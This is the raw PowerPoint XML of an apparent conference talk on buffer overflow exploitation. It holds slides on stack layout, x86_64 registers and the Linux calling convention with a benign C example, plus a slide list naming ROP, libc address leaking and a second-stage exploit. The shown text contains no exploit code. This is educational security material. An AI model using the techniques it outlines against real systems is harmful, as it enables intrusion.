              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="15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2766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Code and Presentation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B43F81-B7A0-D0FC-00C4-7C48A260A221}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1447801" y="1984503"/>
            <a:ext cx="9601196" cy="40437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SzPct val="114999"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/vc48372/KrakenKon2022.git</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0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5658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Why is Buffer Overflow (BOF) relevant?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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34643146-0D70-C0C2-8407-9DC024ABB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6732"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1057469" y="3226837"/>
          <a:ext cx="10096231" cy="201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20109">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1163706917"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2647561">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2911345487"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2869159">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="8504813"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2159402">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3809777979"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="11779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Initial Access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400" b="1" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Garamond"/>
                        </a:rPr>
                        <a:t>(TA0001)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US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Execution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400" b="1" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Garamond"/>
                        </a:rPr>
                        <a:t>(T1203)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US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Privilege Escalation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400" b="1" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Garamond"/>
                        </a:rPr>
                        <a:t>(TA0004)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US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Lateral Movement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400" b="1" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Garamond"/>
                        </a:rPr>
                        <a:t>(TA0008)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US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89592"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="8164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Exploit Public-Facing Application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Exploitation for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Client Execution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Exploitation for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Privilege Escalation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effectLst/>
                        </a:rPr>
                        <a:t>Exploitation of Remote Services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797673"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame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884A7709-9B8B-620D-E013-994302E65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441" y="1820714"/>
            <a:ext cx="2323323" cy="13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90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What is Buffer Overflow?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pPr>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Buffer overflow condition exists when user can put more data than what was intended in the program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Writing data outside of the intended buffer can corrupt data, crash the program, or cause the execution of malicious code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Languages: C, C++, Fortran, Assembly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buSzPct val="114999"/>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buSzPct val="114999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4470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How does Stack work in a computer memory?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48517D-FB52-E063-9532-20FC0E12A103}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8374793" y="2244881"/>
            <a:ext cx="289040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push – add</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>pop – remove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FA7908-1058-8896-9C6C-C186479FD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85137"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4636449" y="1667218"/>
          <a:ext cx="3039028" cy="4494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9028">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="173260655"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="75297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i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Garamond"/>
                        </a:rPr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493288"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="75297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Stack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33610802"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="584488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727521"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="58448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data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997276"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="75297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Heap</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="32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4979320"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="75297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4426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E681A57-EA22-1D60-5621-3A88843F4093}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8741618" y="4097165"/>
            <a:ext cx="10325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/>
              <a:t>Pop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6D8709-24C7-8635-5577-F6654520EFFC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6763333" y="2570390"/>
            <a:ext cx="4666" cy="867747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06A409-79CE-4D4F-7226-95B68DD68987}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2861035" y="4097871"/>
            <a:ext cx="10325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/>
              <a:t>Push</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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0EBC029E-E555-2E1B-BF8E-D913751F834A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2314628" y="3667743"/>
            <a:ext cx="2231570" cy="73089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F3B71D0C-A150-ED95-DE15-74197096EAB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="8057725" y="4213265"/>
            <a:ext cx="2231570" cy="66091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88F4D8-403E-C2B5-3862-E40F1796595A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1818143" y="1783359"/>
            <a:ext cx="289429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High Address</a:t>
            </a:r>
            <a:endParaRPr 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15AEDC-E0B9-0D96-DE37-DA6A3C56F3B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1813708" y="5577519"/>
            <a:ext cx="28592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Low Address</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1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A4BB70-1A2F-8751-5FB3-EEB2F833F0DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6759339" y="4503205"/>
            <a:ext cx="12652" cy="734184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51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Common CPU Registers (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="+mj-lt"/>
              </a:rPr>
              <a:t>x86_64)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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C16902A8-5F6F-6D1D-C0B1-7A7B68CB71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876778"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1506482" y="2005724"/>
          <a:ext cx="3369987" cy="38404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369987">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1920136202"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="43347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000" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Garamond"/>
                        </a:rPr>
                        <a:t>General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494154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000" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Garamond"/>
                        </a:rPr>
                        <a:t>rax</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="30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13972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r>
                        <a:rPr lang="en-US" sz="3000" dirty="0" err="1"/>
                        <a:t>rbx</a:t>
                      </a:r>
                      <a:endParaRPr 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21223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r>
                        <a:rPr lang="en-US" sz="3000" dirty="0" err="1"/>
                        <a:t>rcx</a:t>
                      </a:r>
                      <a:endParaRPr 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919964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r>
                        <a:rPr lang="en-US" sz="3000" dirty="0" err="1"/>
                        <a:t>rdx</a:t>
                      </a:r>
                      <a:endParaRPr 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1554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r>
                        <a:rPr lang="en-US" sz="3000" dirty="0" err="1"/>
                        <a:t>rdi</a:t>
                      </a:r>
                      <a:endParaRPr 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081477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r>
                        <a:rPr lang="en-US" sz="3000" dirty="0" err="1"/>
                        <a:t>rsi</a:t>
                      </a:r>
                      <a:endParaRPr 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971099"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame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1C489FE-4F69-EBD4-50A9-F8B9D09FB7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6153370"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5759490" y="2072001"/>
          <a:ext cx="4894852" cy="26517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447426">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3547640416"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2447426">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4264393342"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="433478">
                <a:tc grid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i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Garamond"/>
                        </a:rPr>
                        <a:t>Special Registers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15926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0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Garamond"/>
                        </a:rPr>
                        <a:t>rbp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0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Garamond"/>
                        </a:rPr>
                        <a:t>Base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769541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0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Garamond"/>
                        </a:rPr>
                        <a:t>rsp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0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Garamond"/>
                        </a:rPr>
                        <a:t>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269937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0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Garamond"/>
                        </a:rPr>
                        <a:t>rip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0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Garamond"/>
                        </a:rPr>
                        <a:t>Instruction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94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7694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Linux Calling Convention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01540C-A49E-8047-8D70-45176DCB6096}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295081" y="1825404"/>
            <a:ext cx="3656246" cy="42032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stdlib.h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&gt;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stdio.h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&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p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int callee(int a, int b, int c) {</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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   return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a+b+c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}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US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int main() {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   int temp = callee(1,2,3);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  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printf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("number: %d\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n",temp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}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p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BD5FAF-D28E-7D15-106B-D0F3B0C81320}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5316625" y="1512420"/>
            <a:ext cx="6265003" cy="473824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sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="24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 sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill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push   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>rbp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" err="1">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>mov    edx,0x3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>mov    esi,0x2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>mov    edi,0x1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>call   0x1149 &lt;callee&gt;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...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>lea    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>rdi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>,[rip+0xe6c]        # 0x2004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mov    eax,0x0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call   0x1050 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>printf@plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&gt;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...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>ret   </a:t>
            </a:r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FC442-6843-8DAE-33B5-E74865255094}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1670538" y="4446395"/>
            <a:ext cx="2461846" cy="3433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1F875F-F32C-D31C-BF3D-3F1D739384C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6359768" y="2637691"/>
            <a:ext cx="2085033" cy="10718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9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TF10001119</Template>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Slides>48</Slides>
  <Notes>37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Organic</vt:lpstr>
      <vt:lpstr>A Modern Approach to  Buffer Overflow Exploit </vt:lpstr>
      <vt:lpstr>Whoami? </vt:lpstr>
      <vt:lpstr>Overview</vt:lpstr>
      <vt:lpstr>Why is Buffer Overflow (BOF) relevant?</vt:lpstr>
      <vt:lpstr>Why is Buffer Overflow (BOF) relevant?</vt:lpstr>
      <vt:lpstr>What is Buffer Overflow?</vt:lpstr>
      <vt:lpstr>How does Stack work in a computer memory?</vt:lpstr>
      <vt:lpstr>Common CPU Registers (x86_64)</vt:lpstr>
      <vt:lpstr>Linux Calling Convention</vt:lpstr>
      <vt:lpstr>Linux Calling Convention</vt:lpstr>
      <vt:lpstr>Linux Calling Convention</vt:lpstr>
      <vt:lpstr>Linux Calling Convention</vt:lpstr>
      <vt:lpstr>Traditional Buffer Overflow Exploit</vt:lpstr>
      <vt:lpstr>Traditional Buffer Overflow Exploit (cont.)</vt:lpstr>
      <vt:lpstr>Traditional Buffer Overflow Exploit (cont.)</vt:lpstr>
      <vt:lpstr>Traditional Buffer Overflow Exploit (cont.)</vt:lpstr>
      <vt:lpstr>Why does traditional BOF no longer work?</vt:lpstr>
      <vt:lpstr>Return Object Programing (ROP)</vt:lpstr>
      <vt:lpstr>Return Object Programing (ROP)</vt:lpstr>
      <vt:lpstr>Return to Libc</vt:lpstr>
      <vt:lpstr>ROP Exploitation</vt:lpstr>
      <vt:lpstr>ROP Exploitation (cont.)</vt:lpstr>
      <vt:lpstr>ROP Exploitation (cont.)</vt:lpstr>
      <vt:lpstr>ROP Exploitation (cont.) </vt:lpstr>
      <vt:lpstr>ROP Exploitation (cont.) </vt:lpstr>
      <vt:lpstr>ROP Exploitation (cont.) </vt:lpstr>
      <vt:lpstr>Leaking Libc Address</vt:lpstr>
      <vt:lpstr>Leaking Libc Address</vt:lpstr>
      <vt:lpstr>Leaking Libc Address (cont.)</vt:lpstr>
      <vt:lpstr>Leaking Libc Address (cont.)</vt:lpstr>
      <vt:lpstr>Leaking Libc Address (cont.)</vt:lpstr>
      <vt:lpstr>Leaking Libc Address (cont.)</vt:lpstr>
      <vt:lpstr>Time to Do Some Math</vt:lpstr>
      <vt:lpstr>Time to Do Some Math</vt:lpstr>
      <vt:lpstr>Time to Do Some Math</vt:lpstr>
      <vt:lpstr>Time to Do Some Math</vt:lpstr>
      <vt:lpstr>Time to Do Some Math</vt:lpstr>
      <vt:lpstr>Second Stage Exploit</vt:lpstr>
      <vt:lpstr>Second Stage Exploit (cont.)</vt:lpstr>
      <vt:lpstr>Second Stage Exploit (cont.)</vt:lpstr>
      <vt:lpstr>Second Stage Exploit (cont.)</vt:lpstr>
      <vt:lpstr>Demo</vt:lpstr>
      <vt:lpstr>Demo (cont.)</vt:lpstr>
      <vt:lpstr>How to prevent BOF exploits</vt:lpstr>
      <vt:lpstr>Summary</vt:lpstr>
      <vt:lpstr>Questions/Comments</vt:lpstr>
      <vt:lpstr>References</vt:lpstr>
      <vt:lpstr>Code and Presentation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842</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-10-05T04:31:14Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-05-14T06:30:03Z</dcterms:modified>
</cp:coreProperties>
</file>